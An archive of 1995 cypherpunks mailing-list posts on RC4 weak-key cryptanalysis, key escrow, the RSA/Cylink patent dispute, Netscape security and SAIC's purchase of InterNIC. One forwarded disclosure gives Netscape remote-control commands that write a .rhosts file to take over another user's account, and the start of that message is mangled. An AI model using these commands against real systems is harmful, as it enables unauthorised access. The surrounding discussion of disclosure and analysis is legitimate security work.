Sep 95 23:59:51 PDT Subject: [NOISE] Re: SAIC bought InterNic, but who is SAIC? A spook contractor! Message-ID: <199509290659.XAA09160@ix7.ix.netcom.com> >SAIC's board members include Admiral Bobby Inman, former NSA head and deputy >director of the CIA; Melvin Laird, Nixon's defense secretary; and retired >General Max Thurman, commander of the Panama Invasion. Recently departed >board members include Robert Gates, former CIA director; William Perry, >current Secretary of Defense; and John Deutch, the current CIA director. ... >"At the very time the Internet community is struggling with the issues of >encryption and privacy, I'm more than a little uneasy to find this bunch of >ex-spooks sitting at the very entry point of the Net," says Jim Warren (a Yeah, that _is_ a pretty spooky bunch; I don't know if anybody'd have standing to do a conflict-of-interest or governmental ethics case of any sort, since it is more or less a monopoly? [BEGIN NOISE] On the other hand, I suppose I'd rather have the CIA making money by selling directory services than, say, dealing cocaine or collecting graft from third-world governments :-) [END NOISE] >Current SAIC government contracts include re-engineering information systems >at the Pentagon, automation of the FBI's computerized fingerprint >identification system, and building a national criminal history information >system. SAIC's a fairly generalized contracting firm, specializing in study contracts and other front-end work rather than back-end implementation grunt-work; I'm not surprised by the list. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Fri Sep 29 00:00:30 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 29 Sep 95 00:00:30 PDT Subject: Netscpae & Fortezza (Or, say it Ain't so, Jeff?) Message-ID: <199509290659.XAA09185@ix7.ix.netcom.com> >I for one am against any kind of GAK on moral grounds. I also think >that trying to implement mandatory GAK in a software only system >would be a nightmare. Unfortunately, it's quite simple, if your only intent is to get the keys, and not to use it as a way to increase NSA leverage... Carl Ellison's web page points out the simple version of this, and it's easy to extend to make it more reliable. 1) Have the NSA/NIST/DEA/etc. generate public keys for their GAK agents. 2) Have each session-key-transfer encrypt a copy of the session key with the public key of the GAK agent, and send it at the beginning of the connection. 3) To make it more robust, have the recipient of the session key also encrypt the session key with the GAK key and send it back, so that a conformist receiver can rat the key even if the sender didn't. (takes a little protocol support to make sure the sender doesn't mind getting it echoed back to her.) Unlike Steven Walker's fancy complex method (which Dorothy liked a lot), this is simple and straightforward, and requires no validation by the recipient. (Both parties could send fakes, but they could do that anyway.) What it doesn't do is allow third parties to detect whether the GAK field has the real session key in it or a fake, but c'est la guerre. You can even get fancier and support M-of-N splitting, requiring M of N GAK agents to give out their keyparts; just do the split and encrypt each piece with the corresponding GAK agent's public key. This also works in a wide variety of environments (e.g. Diffie-Hellman). You could also scrounge a few bits by using the GAK field as an IV if you need one. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From nelson at santafe.edu Fri Sep 29 00:13:24 1995 From: nelson at santafe.edu (Nelson Minar) Date: Fri, 29 Sep 95 00:13:24 PDT Subject: No Subject In-Reply-To: <199509290439.FAA26254@utopia.hacktic.nl> Message-ID: <9509290711.AA07934@sfi.santafe.edu> >>Although no encryption system was totally secure, Mr Dent estimated >>it would take "25 Cray supercomputers a year" to break the STT codes. >Is it just me, or does someone need to be humbled? They're certainly calling out for some external evaluation. Has anyone read the specs? Care to summarize? I'm curious if the "25 crays one year" comment is intended to mean anything, or if it's just some foolish PR person who doesn't understand what he's talking about. From sameer at c2.org Fri Sep 29 00:27:10 1995 From: sameer at c2.org (sameer) Date: Fri, 29 Sep 95 00:27:10 PDT Subject: your mail In-Reply-To: <9509290711.AA07934@sfi.santafe.edu> Message-ID: <199509290722.AAA01028@infinity.c2.org> As if the ITAR would allow something like that to be exported? As if microsoft would actually produce a product which the ITAR wouldn't allow to export? Sounds like PR bullshit. Compared to this Netscape's PR looks -good-. Stay tuned for Hack Microsoft. Community ConneXion gets into the T-shirt biz. ;-) > > >>Although no encryption system was totally secure, Mr Dent estimated > >>it would take "25 Cray supercomputers a year" to break the STT codes. > >Is it just me, or does someone need to be humbled? > > They're certainly calling out for some external evaluation. > > Has anyone read the specs? Care to summarize? I'm curious if the "25 > crays one year" comment is intended to mean anything, or if it's just > some foolish PR person who doesn't understand what he's talking about. > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From sameer at c2.org Fri Sep 29 01:07:40 1995 From: sameer at c2.org (sameer) Date: Fri, 29 Sep 95 01:07:40 PDT Subject: Cypherpunks Fax Service Message-ID: <199509290802.BAA03251@infinity.c2.org> I see a potential business opportunity for enterprising cypherpunks: People have been posting things saying "we should have press releases". People have been posting useful information regarding fax numbers of reporters around the country and such. In this I see a potential low-maintenance business opportunity for some enterprising cypherpunk with a high-grade fax machine. There is no way anyone can make a 'Cypherpunk press release' because there is no "Cypherpunk Organization". There -are- however, cypherpunks organizations. Community ConneXion is one, for example, and others such as COMSEC partners may be considered cypherpunk organizations. Some enterprising cypherpunk may wish to sell the services of their fax machine so that cypherpunk organizations don't need to invest the time towards building up a good database of press fax numbers. For some fee a cypherpunk organization would send only to the service a press release, and the service would make sure it reaches all the people in the press who find cypherpunk topics interesting. Hell, if no one sets this up before I get my own mass-faxer setup, I might just do it myself. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From craig at passport.ca Fri Sep 29 01:33:10 1995 From: craig at passport.ca (Craig Hubley) Date: Fri, 29 Sep 95 01:33:10 PDT Subject: SpokesPunking... In-Reply-To: Message-ID: > At 3:03 AM 9/26/95, Craig Hubley wrote: > >"Consensus on cypherpunks seems to be that 40 bit encryption is not viable > > for commercial applications, and that Netscape seems to have taken less > > than due care to choose an appropriate random seed for its session keys." > > No offense offered Craig, 'cause I like reading your stuff here, but the > concensus opinion on cypherpunks is "We don' need no steeenking > spokespunk!". Does this read like spokespunking ? I kind of read it more like journalism. Then again, the role of a temporary mouthpiece, if claimed by anyone, will lead to a series of flame attacks no matter what they say, even if correct and reasonable. And we don't need more of those! So no spokespunking! How about standardizing on: "It seems to me that..." and if someone wants to refer to his impression of what 'other' punks think, then so be it. >It seems to me that you can say that without any title, and > the mouthier amongst us will be tapped for quotes as individuals anyway... As I was today. Banking technology or some such trade rag. Stay tuned for the editor's guaranteed-outrageous misquotes. I was careful not to say anything that might be constured as a quasi-official 'punk' position. I made the point that the hacking of secure systems, when done in the open, and without intent to grab private information, was a legitimate activity in the computer security community, which included the cypherpunks as one of several interested sub-communities. And that Netscape saw it that way too, having acknowledged that they had 'learned a lot', etc. So... Flame me! -- Craig Hubley Business that runs on knowledge Craig Hubley & Associates needs software that runs on the net mailto:craig at hubley.com 416-778-6136 416-778-1965 FAX Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5 From craig at passport.ca Fri Sep 29 01:36:57 1995 From: craig at passport.ca (Craig Hubley) Date: Fri, 29 Sep 95 01:36:57 PDT Subject: cypherpunk press releases vs. FAQ In-Reply-To: <199509262141.OAA24578@netcom8.netcom.com> Message-ID: I favor a FAQ, but only if each individual answer is attributed to a specific person and others can answer the same question with possibly a contradictory answer (but may not refer to the others' answer, that just makes it quoting and flaming). Perhaps organized as a hypertext. Everyone has an HTML browser now, right ? -- Craig Hubley Business that runs on knowledge Craig Hubley & Associates needs software that runs on the net mailto:craig at hubley.com 416-778-6136 416-778-1965 FAX Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5 From sameer at c2.org Fri Sep 29 01:46:32 1995 From: sameer at c2.org (sameer) Date: Fri, 29 Sep 95 01:46:32 PDT Subject: COMMUNITY CONNEXION TO OFFER REWARD FOR HACKING MICROSOFT Message-ID: <199509290841.BAA05624@infinity.c2.org> For Immediate Release Contact: Sameer Parekh 510-601-9777 (Pager: 510-321-1014) COMMUNITY CONNEXION TO OFFER REWARD FOR HACKING MICROSOFT Sept. 29 1995 - Community ConneXion, an Internet Privacy Provider in Berkeley, CA, announced today that it will be providing awards to people who find and publicize security holes in Microsoft products. "Microsoft claims to be promoting secure transactions on the net," said Sameer Parekh, founder of Community ConneXion, "We will prove them wrong." Microsoft has been quoted making disparaging comments about their competitor Netscape's product, Netscape Navigator. Community ConneXion has also been offering a reward to expose holes in Netscape's products. "We target widely used programs," said Parekh. Parekh expects that many bugs and flaws in Microsoft's security software will be found. People want to use the Internet to do business. They want to be able to buy things, manage their finances, and communicate privately from the comfort of their home computer. Without a secure infrastructure none of this is possible. Information about the Hack Microsoft promotion is available from http://www.c2.org/hackmsoft/. People who have found security holes and have written exploits are directed to send mail to hackmsoft at c2.org. Community ConneXion is the premier provider of privacy on the Internet. They provide anonymous email accounts and support the anonymous remailer infrastructure. Information is available from http://www.c2.org/ or info at c2.org. Microsoft is a trademark of Microsoft Corp. Netscape and Netscape Navigator are trademarks of Netscape Communications Corp. This promotion is not affiliated with Microsoft or Netscape. From fc at all.net Fri Sep 29 02:58:24 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Fri, 29 Sep 95 02:58:24 PDT Subject: SAIC bought InterNic, but who is SAIC? A spook contractor! In-Reply-To: <9509290018.AA08111@toad.com> Message-ID: <9509290956.AA14949@all.net> > From: Wes Thomas > > The press recently reported that the National Science Foundation has turned > over Internet Domain Name registration to Network Solutions, Inc. (NSI) of > Herndon, VA. The press failed to note some interesting connections. > > Tomorrow morning (Sept. 26), Web Review, a biweekly online magazine (see > Special Report at http://gnn.com/wr/) will reveal that NSI was purchased in > May by Scientific Applications International Corporation (SAIC) of San That's Science Applications ... An employee owned systems integrator. They are one of the largest systems integrators in the world, 2nd largest to the US government (last time I looked). > Diego. SAIC is a $2 billion company indicted by the Justice Department on > ten felony counts for fraud in managing a Superfund toxic cleanup site (SAIC > pleaded guilty) and sued by the Justice Department for civil fraud on an > F-15 fighter contract. Interesting summary, but you forgot to note that what really happened was that SAIC made some bookkeeping errors, noticed them in a self-audit, and reported themselves to the government. Unlike some companies that try to cover these things up, SAIC found the problems themselves and didn't cover them up. > SAIC's board members include Admiral Bobby Inman, former NSA head and deputy > director of the CIA; Melvin Laird, Nixon's defense secretary; and retired > General Max Thurman, commander of the Panama Invasion. Recently departed > board members include Robert Gates, former CIA director; William Perry, > current Secretary of Defense; and John Deutch, the current CIA director. > Current SAIC government contracts include re-engineering information systems > at the Pentagon, automation of the FBI's computerized fingerprint > identification system, and building a national criminal history information > system. SAIC is also one of the largest companies in the information security field, with over 500 active info-sec contracts at any given time. They work for industry as well as government in info-sec, systems integration, and outsourcing. For example, they currently do all of the IT work for BP, handle info-sec for several banks and wall street firms, have contracts with some of the large players in the entertainment business, and sponsored the last Americas cup entry from the US. > "At the very time the Internet community is struggling with the issues of > encryption and privacy, I'm more than a little uneasy to find this bunch of > ex-spooks sitting at the very entry point of the Net," says Jim Warren (a > leading activist in making government records accessible) in the article, > which was written by investigative journalist Stephen Pizzo, Web Review > Senior Editor and co-author of the book Inside Job, an expose on the savings > & loan looting. The real ex-spooks aren't that heavily embedded in SAIC. The company was started by a well known physicist who is still the CEO and chairman, and they do a lot of research in preserving the environment, undersea research, business reengineering, and other things that are not spookish. Just thought I would present the rest of the story. By the way, I have been a consultant for them from time to time, and I have found them to be hard working, intelligent, and highly motivated. They do indeed have a lot of very intelligent people working for them, many of whom used to work in high-level positions for both democratic and republican administrations, but I don't think you should hold that against them - after all, if you were a major government contractor, wouldn't you want to get people who know how the government works? -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From AndrewR at beetle.vironix.co.za Fri Sep 29 04:02:31 1995 From: AndrewR at beetle.vironix.co.za (Andrew Roos) Date: Fri, 29 Sep 95 04:02:31 PDT Subject: Cryptanalysis of RC4 - Preliminary Results (Repeat) Message-ID: <306BD292@beetle.vironix.co.za> (This is a repeat because I posted the original 36 hours ago and it still hasn't bounced back to me.) -----BEGIN PGP SIGNED MESSAGE----- Hi c'punks & sci.cryptites About a week ago I posted a message about weak keys in RC4. This is an update on the results of my continued 4am sessions with RC4 and shows that certain weak keys lead to an almost-feasible known plaintext attack on the cipher (well, about as feasible as the differential attack on DES, shall we say). The attack is based on two particularly interesting three-byte key prefixes which have a high probability of producing PRNG sequences which start with a known two-byte sequence. The prefixes are: 1. Keys starting with "00 00 FD" which have a 14% probability of generating sequences which start "00 00". 2. Keys starting with "03 FD FC" which have a 5% probability of generating sequences which start "FF 03". Note that the expected frequency of any two-byte output sequence is 1 in 65536 or about 0.0015%, so these key prefixes are highly unusual. I won't go into the reasons why in this post, since it follows the same reasoning as my last post, but these prefixes are special in that they have a high probability of initializing the RC4 state table in such a way that the first two generated bytes depend only on the first three entries in the state table. This observation is the basis for a simple known-plaintext attack which reduces the effective key space which you need to search to have a 50% probability of discovering a key by about 11.2 bits. The down side is that you need "quite a few" known plaintexts to make the attack feasible. It works as follows: 1. Collect a large number of known plaintexts (and hence known generator sequences). 2. Discard generator sequences which do not start with "00 00" or "FF 03". 3. For generator streams starting "00 00", search all keys which begin with "00 00 FD". 4. For generator streams staring "FF 03", search all keys which begin with "03 FD FC". 5. Keep going until you find a key :-) Clearly this attack will only discover a small fraction of the keys. However since most generator sequences are discarded without being searched, and for those which are searched the search is 2^24 smaller than would be required to search the entire keyspace, the number of trials required to determine a key is significantly lower than for brute force alone. Enough of an intro, here are the relevant results. Forgive my simplistic approach to maths, I'm a philosopher-come-software developer, not a mathematician. I've run the relevant simulations with 40-bit, 64-bit, 80-bit and 128-bit key lengths, and with two different PRNGs. For the sake of consistency with my earlier paper I'll use the figures gathered for 80-bit keys (this seems to be RSA's preferred key length for RC4), but there are no significant differences for other key lengths. The PRNG used for these tests was L'Ecuyer's 32-bit combined linear congruential generator as described in "Applied Cryptography" p. 349. (a) Out of one million trials, keys starting with "00 00 FD" generated sequences starting "00 00" 138217 times, and keys starting with "03 FD FC" generated output sequences starting "FF 03" 50490 times. (b) Out of ten million trials, arbitrary pseudo-random keys generated sequences starting with "00 00" 446 times, and sequences starting with "FF 03" 146 times. (Note the abnormally high incidence of "00 00"; the expected mean is 152.8). Suppose we have the output stream generated by a randomly chosen key. The chance that it will start with either "00 00" or "FF 03", and that we will therefore search it, is: (446 + 146) / 1e7 = 5.92e-5 The chance that it starts with "00 00" and was generated by a key starting with "00 00 FD", or that it starts with "FF 03" and was generated by a key starting "03 FD FC" - i.e. the chance that we will search it and be rewarded for our efforts - is: (138217 + 50490)/(1e6 * 2^24) = 1.12e-8 The total number of plaintexts required for a 50% chance that we will discover one of the keys is: log(0.5)/log(1 - 1.12e-8) = 61 900 000 Well I did say "quite a few" plaintexts would be necessary :-) And the number of plaintexts which you expect to search in order to find the "right" one is: 61 900 000 * 5.92e-5 = 3665 Since the total key length is 80 bits, and we are "guessing" 24 of these, each search requires 2^56 trials. Hence the total number of trials for a 50% chance of discovering a key is: 3665 * 2^56 = 2.64e20 = 2 ^ 67.8 Since brute search alone would require 2^79 trials for a 50% chance of determining the key, this reduces the number of trials by 2^11.2. The results are essentially identical for all the key lengths I have tried, and in each case reduce effective key length by about 11.2 bits. So, for example, a 64-bit key would normally require 2^63 trials for 50% chance of solution; this attack reduces the number of trials to 2^51.8 at the cost of requiring 62 million known plaintexts. I'm still running simulations to check my maths, and although initial results are encouraging, I don't have enough data for it to be statistically relevant yet (generating all these sets of 62 million known streams takes time...) So consider this preliminary (again), and I'll post the results of my simulations when I have enough data. Andrew ________________________________________________________________ Andrew Roos // C++ programmers have class (but not much inheritance) PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26 Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMGrlfmatuqa4OR+lAQF1eQP+IBBmSztAYUpq1q/BjzvYDCbb+Ns0Gi1S u9wTaZOCl32fdp7NSUEQBX39nVJkQZginug56BZXzijRvOx6fl4+z7dmW9jwtE5E YNCOhx+/fHX4psszMyEUTrnza7MYDc4HXlgv743LOD/xvEyU0D5OGgB5fg+lyhAK 6xQ/Zy8JpE8= =BdMn -----END PGP SIGNATURE----- From jeffb at sware.com Fri Sep 29 05:28:46 1995 From: jeffb at sware.com (Jeff Barber) Date: Fri, 29 Sep 95 05:28:46 PDT Subject: Q&A on the RSA/Cylink legal dispute In-Reply-To: <9508288123.AA812314973@snail.rsa.com> Message-ID: <9509291227.AA03616@wombat.sware.com> IANAL, but after a couple of hours of slogging through the arbitration report, here's my layman's interpretation: - Either both sides or neither side breached the agreement forming PKP (the arbitrators went out their way to avoid assigning blame) - PKP is dissolved by mutual agreement. - Cylink maintains control of the Stanford patents (Hellman-Merkle, Diffie-Hellman [others (?)]) - RSA maintains control of the MIT patents (RSA [others]) - It isn't clear to me whether Cylink maintained the right to use the RSA software in creating a product. The arbitration order was as clear as mud on this point. It is clearer that they maintained the right to *use the patented technology* covered by the MIT patents in the creation of a product. In either case, it appears that their right does not extend to the point where they can sublicense the technology -- so it looks to me like Cylink can't sell you an RSA toolkit, for instance. - RSA has no rights to license the Stanford patents. RSA's FAQ (via baldwin at rsa.com) writes: > A. The Panel's ruling was very specific. Everything it said about third > parties, including RSA customers who use software, refers to their need > for patent licenses. If you bought software from RSA and RSA itself had > the rights to make that software and license it to you, you don't need > a separate patent license; rights to the patents came with the product. > The Ruling also states, "RSA has a right to license its software." This answer is evasive. RSA didn't give the complete sentence from the arbitration panel's order. It is: "Therefore, after April 6, 1990, RSA has a right to license its (RSA's) software to third-parties but does not have the right to license such third-parties under the Stanford patents." So, their answer appears to be correct only if the RSA software doesn't infringe the Stanford patents. And that seems to be a matter of opinion. Furthermore, the next sentence in the order continues: "To the extent RSA provides code to third-parties which causes an infringement of a valid and enforceable claim of the Stanford patents, assuming the third party is not separately licensed under the Stanford patent [sic], nothing in this order shall prevent Cylink from pursuing its rights under the Stanford patents against such third party." That's pretty clear to me folks, but make your own judgements. > If > you're using RSA's software -you didn't write your own- you don't need > a separate patent license under either the MIT or Stanford patents. Again, only to the extent that you're not infringing the Stanford patents. So, pay your nickel, take your chances. Does RSA's software infringe the Stanford patents? (Of course these are my opinions, not my company's) -- Jeff From nefud at io.com Fri Sep 29 05:57:13 1995 From: nefud at io.com (Allan Bailey) Date: Fri, 29 Sep 95 05:57:13 PDT Subject: screensavers and idle computation. Message-ID: <199509291252.HAA13292@tristero.io.com> To the folx working on the RC4 et. al. distributed keysearch Net: Add a module that will be run from things like "xscreensaver". As Tim May pointed out, current use of crypto is a "tiny fraction of the total computons consumed running screen savers". So let use them, eh? Besides, it'd be kind of neat seeing the "galaxies in hyperspace" displayed in a fractal like screensaver image. -- Allan Bailey | "Freedom is not free." _O_ Senlima Diverseco je Senlimaj Kombinajxoj.| nefud at io.com | KC5KSF | GCS w+ v-/+ C++++ U@$ P+++ L++ E++ N++ po--- Y++ b++ ============================================================ = When Privacy Is Outlawed, Only Outlaws Will Have Privacy = = I Support the Phil Zimmermann Legal Defense Fund! = = email: zldf at clark.net http://www.netresponse.com/zldf = ============================================================ From klp at gold.tc.umn.edu Fri Sep 29 06:27:18 1995 From: klp at gold.tc.umn.edu (Kevin L Prigge) Date: Fri, 29 Sep 95 06:27:18 PDT Subject: FinCen Blurb in local paper Message-ID: <306bf42f13dd002@noc.cis.umn.edu> Found this in the St Paul Pioneer Press yesterday, no wire service attribution. Cyber banking risks cited New York Smart Cards, on-line banking and other high-tech consumer payment services could be exploited by money launderers and other crooks, a Treasury Department official warned Wednesday. Stanley Morris, director of the Financial Crimes Enforcement Network, said that government and regulatory agencies believe the new systems, known as cyber banking, will profoundly alter financial services in the future. "The government has got to get its act together" and quickly decide on whether on-line banking systems and smart cards require new regulations," Morris said. Morris spoke to reporters after a day-long closed-door meeting of bankers, regulators, law enforcement officials and technology executives sponsored by FinCen, the governments anti-money laundering agency. --- end article --- -- Kevin Prigge | Holes in whats left of my reason, CIS Consultant | holes in the knees of my blues, Computer & Information Services | odds against me been increasin' email: klp at cis.umn.edu | but I'll pull through... From millar at pobox.upenn.edu Fri Sep 29 06:29:07 1995 From: millar at pobox.upenn.edu (Dave Millar) Date: Fri, 29 Sep 95 06:29:07 PDT Subject: Assessing Netscape Commerce Server Risk Message-ID: <199509291328.JAA08472@pobox.upenn.edu> Would anyone care to critique this assessment? >Q: What is the risk of implementing the Commerce Server without waiting for >the Oct. 9 patch (which fixes the randomness problem with the server's >public/private key pair)? >A: The exposure is essentially this: if someone were to make a concerted >attack on your public/private key pair, they might be able to discover your >private key. Combined with net eavesdropping this would allow interception >and decrypting of SSL-encrypted traffic to your Commerce Server, and >combined with IP address and DNS domain impersonation would allow someone >to masquerade as your server. > >I would characterize this risk as low to moderate, with the higher risk >only applying if your Commerce Server is handling larger financial >transactions or extremely sensitive information. > >The time required for an attack on your key pair depends on how close the >attacker can come to guessing exactly when your key pair was generated, and >what the pid/ppid were for the key generation program at the time the key >was generated, as well as how fast the attacker can generate candidate key >pairs. Since the time and pid/ppid are probably guessable only within >broad limits (e.g., within a few days for the time), and generating key >pairs takes on the order of a second or so, the estimated attack times are >much longer than the attack times for SSL messages. I believe Netscape has >published estimates like 60 days or so to crack a key pair; even if those >estimates are too high by factors of two or three the times are still >comparable to the time until the patch is available. > >So if you're really concerned you can certainly eliminate the risk by >shutting down SSL-secure services until you get the patch; however I'd >weigh that against the downside of not having those services accessible. > >P.S. If you do continue running your Commerce Server with SSL, one simple >thing that might help thwart attacks is to do a "touch" on your server key >file and server certificate file (or copy them somewhere and then copy them >back) to update the date/time modified on the files. This eliminates one >possible clue as to when the key pair was generated. _________________________________________________ Dave Millar University Information Security Officer 3401 Walnut St., Suite 265C Philadelphia, PA 19104-6228 University of Pennsylvania For security matters: security at isc.upenn.edu (read by Data Admin. staff) Other matters: millar at pobox.upenn.edu voice: (215) 898-2172 fax: (215) 898-1729 For PGP 2.6 Public key: http://www.upenn.edu/security-privacy/ PGP Fingerprint: 28 FB 09 DC C7 96 C2 53 1A B8 BE 3B 73 32 46 4C From Doug.Hughes at Eng.Auburn.EDU Fri Sep 29 06:35:40 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Fri, 29 Sep 95 06:35:40 PDT Subject: worldwide announce: New OTP Mail/FTP apps In-Reply-To: <199509282349.TAA00187@hoopsnake.cjs.net> Message-ID: >> One initial connection is all that is needed to have a secure >> connection for the lifetime of the two communicating parties. This >> initial connection can be accomplished via any number of ways. It >> does involve an initial one time only shared secret. This is much >> different than the many shared secrets and key management issues of >> private and public key systems. For the initial connection you can >> stick the machines back to back if you are really worried about >> security. This initial transaction serves as a seed for subsequent >> transactions. All subsequent transactions depend on preceding >> transactions. A degree of randomness comes from the randomness of >> the messages. Each next word in the message is random. > >I'm a little new to this, but I thought the whole idea behind keys was >not having to whisper "secrets" to someone on the other side of a >crowded mall. Most people don't have the luxary of connecting their >computers back to back with someone on the other side of the world >just to ensure a secure communications path. Ther would have to be >some mechnisms to ensure that secure delivery of your "secret", and >that brings us back to key management, so the whole thing is rather >self defeating. > >Christopher > > > Remember, that's only one of the options for the truly paranoid. If you want, you can just use their (for now secret) keying implementation on the floppy disk for the first exchange. I feel a little uncomfortable with this at the moment (as I'm sure do most of the other readers). The algorithm, once revealed should be a very interesting read. However, this does not bring us back to key management in the sense of traditional public or private cryptosystems. Since the entire communication hinges on the first successful exchange, this is the exchange where they key is most critical. I believe they have an option for entering a secret key (initialization vector it seems) as well. So, presumable you could call somebody on the phone, or send them a PGP message, or whatever, to exchange this initial key. It still seems to me that once this initial communication is out of the way, that the product will work fairly well. I see it as an excellent way, in our situation, to provide remote professors and students secure communication paths to our network in the future (hinging on the development of some kind of telnet client). I rather think that the whole public/private key thing is self-defeating... computers get more powerful, key gets hacked... key size increases.. etc.. etc.. This sounds like a novel alternative. People interested in non-disclosure analsysis may wish to contact the company. Elementrix: 212-888-8879, 850 Third Avenue NY, NY 10022 (North America office) I'm not sure what, if any, real cryptanalysis has been done on this. David Kahn himself admitted he wasn't an expert cryptanalyst. I don't know if anybody has done any in depth review or subjected it to differential cryptanalysis of any kind. It seems to be a OTP/stream cipher of some kind.. subsequent number depending on previous numbers. I don't know if its possible to prove that the sequence will never repeat, having not seen the algorithm. But if it did not, it would seem to be strong enough. Too many questions, too few answers. -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu Apple T-shirt on Win95 - "Been there, done that" From jk at digit.ee Fri Sep 29 06:59:39 1995 From: jk at digit.ee (Jyri Kaljundi) Date: Fri, 29 Sep 95 06:59:39 PDT Subject: Netscape hole without .Xauthority (fwd) Message-ID: Haven't seen this on the cypherpunks yet, sorry if this has been here already. Juri o tel: +372 6308994 o> )" netscape -noraise -remote "saveAs(.rhosts)" netscape -noraise -remote back In the second command, the path should be specified whenever possible (~ is not accepted). If the target user does not already have a .rhosts and is not looking at that precise moment, then the chances are it worked ! Solution to the problem : every user concerned should either create a Xauthority file, or stop using Netscape. MXK PS: WHY do they bother with PGP and RSA security when they keep such holes ???? +------------------------------------+---------------------------------+ | Denis AUROUX (MXK) | Ecole Normale Superieure | | 255 rue Saint-Jacques | 45 rue d'Ulm | | 75005 PARIS FRANCE | 75005 PARIS | | email: auroux at clipper.ens.fr | FRANCE | +------------------------------------+---------------------------------+ | This .sig is SHAREWARE. If you use it often, please send me $50. | | After registering you will receive a fully functional .sig and all | | updates for free. | +----------------------------------------------------------------------+ From cme at TIS.COM Fri Sep 29 08:18:02 1995 From: cme at TIS.COM (Carl Ellison) Date: Fri, 29 Sep 95 08:18:02 PDT Subject: netscape NSRANDFILE compatible with /dev/random ? In-Reply-To: <199509282312.QAA26073@comsec.com> Message-ID: <9509291514.AA15468@tis.com> >From: "Jeff Weinstein" >Date: Wed, 27 Sep 1995 00:40:41 -0700 >> What happens if NSRANDFILE is set to /dev/random ? >> will netscape try to read an infinite number of random bytes ? > > In the current patch it will read up to 1 megabyte before stopping. >In 2.0 I will add a way to specify a size. As a temporary hack you >could use 'dd' to get the number of bytes you want into a file, then >remove the file once netscape had started up. or you can define a named pipe file (on UNIX at least) which runs /dev/random through dd. From tcmay at got.net Fri Sep 29 08:39:00 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 29 Sep 95 08:39:00 PDT Subject: Simple Hardware RNG Idea Message-ID: At 4:14 PM 9/28/95, cjs wrote: >Hello all. > >Someone mentioned this on IRC last night, and it sounded like a really >cool idea, so I thought I'd mention it. > >The idea is to generate random numbers using a geiger counter tube and >a small portion of radioactive substance (like perhaps the stuff they >use in smoke detectors?) Would that be random enough? > >I thought it was a neat idea anyway. It's a well-known idea. My FAQ has a section on this, and the Cypherpunks archives have many mentions of this. For the newcomers, here are some of the issues, very briefly presented: 1. Incorporating a "Geiger counter tube" is nontrivial. A solid-state detector does the same thing, and is a better approach. 2. Incorporating Am-241 or other alpha emitters in microcurie levels would require licensing, regulatory oversight, etc., etc. Don't count on it. 3. Data rates are fairly low. Anything that "clicks" at high rates (> 1K counts per second) would be too radioactive to ship. 4. Zener diodes and other random noise sources are cheaper to build, more consistent in output, and easier to integrate into actual products. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From rajaram at morgan.com Fri Sep 29 09:02:46 1995 From: rajaram at morgan.com (P. Rajaram) Date: Fri, 29 Sep 95 09:02:46 PDT Subject: Traveling abroad with laptops Message-ID: <9509291202.ZM20738@morgan.com> What would happen if I flew out of the US with a portable computer that has crypto software (like PGP) installed ? Assuming that I had no intention of distributing the software abroad, would I be violating some US export law ? Matt Blaze (?) had written about his humorous experience in trying to do the right thing. It seems that the US Govt. does not seriously enforce its own export policies. But they may start doing so any time. I am sure that today many people regularly fly into Europe with crypto software, without intending to break any laws. At one point, I had heard that some sort of exception was planned for export of crypto for personal use. Does anyone know if this is real or just a rumor ? regards -raj From sameer at c2.org Fri Sep 29 09:40:25 1995 From: sameer at c2.org (sameer) Date: Fri, 29 Sep 95 09:40:25 PDT Subject: Hack Microsoft In-Reply-To: <199509281510.LAA21039@frankenstein.piermont.com> Message-ID: <199509291635.JAA06820@infinity.c2.org> As of 9:34AM on the day of the release hackmsoft has so far received -two- microsoft bugs and exploits. > > > John Young writes: > > 9-28-95. W$Japer: > > > > Regarding Netscape, Mr. Dent of Microsoft said the > > firm's security deficiencies that have recently come to > > light have "tainted" electronic commerce on the > > Internet. > > Thats almost an invitation to hack Microsoft's web products, isn't it? > > (Anyone from Netscape care to join in the fun?) > > Perry > > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From stripes at va.pubnix.com Fri Sep 29 09:42:39 1995 From: stripes at va.pubnix.com (Josh M. Osborne) Date: Fri, 29 Sep 95 09:42:39 PDT Subject: Netscape hole without .Xauthority (fwd) In-Reply-To: Message-ID: In message , Jyri Kaljundi writes : [...] >There's a huge hole in the Netscape remote control mechanism for the >X-Windows based clients.=20 >Potential impact : anybody can become any user that uses Netscape on any >system without sufficient X security. [...] >PS: WHY do they bother with PGP and RSA security when they keep such holes = >???? Well, I would susspect that because if your X server isn't "secure" there isn't much you can do that is. Other then xterm, most X programs will respond to "synthetic" events (events gennerated by another programs as opposed to the user), this means with a little work anyone with access to the X server could click open the File menu, select "Open URL", type in a URL, press "Open", click "SaveAs", and so on. Even if all X clients stoped listening to synthetic events (which would be a shame - since they are useful in various contexts) X's event structure allows 